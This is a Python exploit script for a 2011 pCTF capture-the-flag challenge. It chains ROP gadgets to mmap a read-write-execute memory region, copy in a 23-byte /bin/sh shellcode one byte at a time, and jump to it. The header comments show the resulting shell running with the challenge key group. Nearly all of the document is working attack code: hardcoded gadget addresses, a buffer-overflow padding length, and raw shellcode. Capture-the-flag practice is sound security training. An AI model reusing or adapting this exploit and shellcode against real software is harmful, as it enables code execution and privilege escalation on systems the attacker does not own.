#!/usr/bin/env python # pCTF 2011 - #19 Another small bug # ROP: mmap an rwx area, copy a shellcode and jump # $ { python exploit.py; cat; } |/opt/pctf/z2/exploitme 1300 # AAAAA[...] # id # uid=2015(z2_16) gid=1001(z2users) egid=1003(z2key) groups=1001(z2users) from struct import pack,unpack mmap = 0x08049ABC pop_4 = 0x08048973 # add esp 0x10 (16=4*4) pop_14 = 0x08048d01 # add esp 0x30 (48=4*12) ; pop ebx ; pop esi add_ecx_al = 0x08049cfd # add [ecx] al pop_ecx = 0x0804889f # pop ecx pop_eax = 0x0804859f # pop eax area,size = 0x13370000, 0x10000 # /bin/sh - 23 bytes SC = "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" def copy_byte(address, byte): s = pack("<I", pop_ecx) s += pack("<I", address) s += pack("<I", pop_eax) s += pack("<I", ord(byte)) s += pack("<I", add_ecx_al) return s p = "A"*532 # mmap an rwx area p += pack("<I", mmap) p += pack("<I", pop_14) p += pack("<I", area) # void *addr p += pack("<I", size) # size_t length p += pack("<I", 0x7) # int prot - PROT_READ(0x1) | PROT_WRITE(0x2) | PROT_EXEC(0x4) p += pack("<I", 0x22) # int flags - MAP_ANONYMOUS(0x20) | MAP_PRIVATE(0x02) p += pack("<I", 0xffffffff) # int fd - MAP_ANONYMOUS => -1 p += pack("<I", 0) # off_t offset p += pack("<I", 0)*(14-6) # unused # copy shellcode - and we dont want 0a :) for i in range(len(SC)): p += copy_byte(area+0xb+i, SC[i]) # jump to it! p += pack("<I", area+0xb) print p